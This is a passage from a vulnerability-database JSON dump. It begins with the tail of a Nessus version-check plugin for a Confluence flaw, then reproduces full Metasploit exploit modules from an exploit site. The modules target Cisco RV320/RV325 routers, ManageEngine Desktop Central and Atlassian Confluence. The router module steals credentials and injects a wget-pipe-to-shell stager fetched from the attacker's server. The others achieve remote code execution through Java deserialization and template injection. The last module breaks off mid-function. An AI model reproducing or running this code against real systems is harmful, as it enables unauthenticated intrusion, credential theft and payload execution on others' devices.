relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = \"confluence\";\n\nport = get_http_port(default:80);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"fixed_version\": \"6.6.12\" },\n {\"min_version\": \"6.7.0\", \"fixed_version\": \"6.12.3\", \"fixed_display\": \"6.12.3 / 6.15.1\"},\n {\"min_version\": \"6.13.0\", \"fixed_version\": \"6.13.3\", \"fixed_display\": \"6.13.3 / 6.15.1\" },\n {\"min_version\": \"6.14.0\", \"fixed_version\": \"6.14.2\", \"fixed_display\": \"6.14.2 / 6.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-28T03:32:02", "description": "This Metasploit module combines an information disclosure (CVE-2019-1653) and a command injection vulnerability (CVE-2019-1652) together to gain unauthenticated remote code execution on Cisco RV320 and RV325 small business routers. Can be exploited via the WAN interface of the router. Either via HTTPS on port 443 or HTTP on port 8007 on some older firmware versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-03-30T00:00:00", "type": "zdt", "title": "Cisco RV320 / RV325 Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-03-30T00:00:00", "id": "1337DAY-ID-32455", "href": "https://0day.today/exploit/description/32455", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::CmdStager\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\n 'Description' => %q{\n This exploit module combines an information disclosure (CVE-2019-1653)\n and a command injection vulnerability (CVE-2019-1652) together to gain\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\n on port 443 or HTTP on port 8007 on some older firmware versions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\n 'Philip Huppert', # Discovery\n 'Benjamin Grap' # Metasploit\n ],\n 'References' => [\n [ 'CVE','2019-1653' ],\n [ 'CVE','2019-1652' ],\n [ 'EDB','46243' ],\n [ 'BID','106728' ],\n [ 'BID','106732' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'LINUX MIPS64',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPS64\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\"\n },\n 'CmdStagerFlavor' => [ 'bourne' ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Sep 9 2018\",\n 'DefaultTarget' => 0))\n\n register_options([\n Opt::RPORT(8007), # port of Cisco webinterface\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\n ])\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\n deregister_options('SSLCert') # not required since stager only uses HTTP.\n end\n\n def execute_command(cmd, opts = {})\n # use generated payload, we don't have to do anything here\n end\n\n def autofilter\n true\n end\n\n def on_request_uri(cli, req)\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\n @cmdstager = generate_cmdstager().join(';')\n send_response(cli, \"#{@cmdstager}\")\n end\n\n def primer\n payload_url = get_uri\n print_status(\"Downloading configuration from #{peer}\")\n if(datastore['USE_SSL'])\n print_status(\"Using SSL connection to router.\")\n end\n res = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\n 'SSL' => datastore['USE_SSL']\n })\n unless res\n vprint_error('Connection failed.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Could not download config. Aborting.')\n return nil\n end\n\n print_status(\"Successfully downloaded config\")\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\n authkey = \"1964300002\"\n print_status(\"Got MD5-Hash: #{pass}\")\n print_status(\"Loging in as user #{username} using password hash.\")\n print_status(\"Using default auth_key #{authkey}\")\n res2 = send_request_cgi({\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\"\n })\n\n unless res\n vprint_error('Connection failed during login. Aborting.')\n return nil\n end\n\n unless res.code == 200\n vprint_error('Login failed with downloaded credentials. Aborting.')\n return nil\n end\n\n #Extract authentication cookies\n cookies = res2.get_cookies()\n print_status(\"Successfully logged in as user #{username}.\")\n print_status(\"Got cookies: #{cookies}\")\n print_status(\"Sending payload. Staging via #{payload_url}.\")\n #Build staging command\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\n if(command_string.length <= 63)\n print_status(\"Staging command length looks good. Sending exploit!\")\n else\n vprint_error(\"Warning: Staging command length probably too long. Trying anyway...\")\n end\n\n res3 = send_request_cgi({\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'cookie' => cookies,\n 'vars_get' => {\n 'type' => '4',\n },\n 'vars_post' => {\n 'page' => 'self_generator.htm',\n 'totalRules' => '1',\n 'OpenVPNRules' => '30',\n 'submitStatus' => '1',\n 'log_ch' => '1',\n 'type' => '4',\n 'Country' => 'A',\n 'state' => 'A',\n 'locality' => 'A',\n 'organization' => 'A',\n 'organization_unit' => 'A',\n 'email' => '[email\u00a0protected]',\n 'KeySize' => '512',\n 'KeyLength' => '1024',\n 'valid_days' => '30',\n 'SelectSubject_c' => '1',\n 'SelectSubject_s' => '1'\n },\n 'data' => \"common_name=#{command_string}\"\n })\n unless res3\n vprint_error('Connection failed while sending command. Aborting.')\n return nil\n end\n\n unless res3.code == 200\n vprint_error('Sending command not successful.')\n return nil\n end\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\n end\n\n def check\n #Check if device is vulnerable by downloading the config\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\n\n unless res\n vprint_error('Connection failed.')\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n unless res.body =~ /PASSWD/\n return CheckCode::Detected\n end\n\n CheckCode::Vulnerable\n end\n\n def exploit\n # Main function.\n # Setting delay for the Stager.\n Timeout.timeout(datastore['HTTPDELAY']) {super}\n rescue Timeout::Error\n print_status(\"Waiting for stager connection timed out. Try increasing the delay.\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/32455", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T13:22:19", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T09:24:35", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-18T00:00:00", "type": "zdt", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "1337DAY-ID-32569", "href": "https://0day.today/exploit/description/32569", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\n 'Description' => %q{\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniil Dmitriev', # Discovering vulnerability\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' =>\n [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021,\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 25 2019',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\n ])\n end\n\n # Handles ftp RETP command.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] RETR argument.\n # @return [void]\n def on_client_command_retr(c, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(c)\n if(not conn)\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n c.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(c, arg)\n @state[c][:pass] = arg\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\n c.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(c, arg)\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns a upload template.\n #\n # @return [String]\n def get_upload_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n )\n end\n\n # Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n )\n end\n\n # Returns checking template.\n #\n # @return [String]\n def get_check_vm\n (\n <<~EOF\n #{@check_text}\n EOF\n )\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n )\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n (\n <<~EOF\n EOF\n )\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout=20)\n\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout=timeout)\n\n unless res\n unless service_url.include?(\"exec.vm\")\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status(\"Server response:\")\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [String]\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n return clear_response(res.body)\n end\n ''\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ /^\\/[[:print:]]+/\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === tmp_path\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n java_home = get_java_home_path\n\n if java_home.blank?\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n else\n vprint_status(\"Found Java home path: #{java_home}\")\n end\n\n register_files_for_cleanup(@fname)\n\n if /^\\/[[:print:]]+/ === @fname\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n 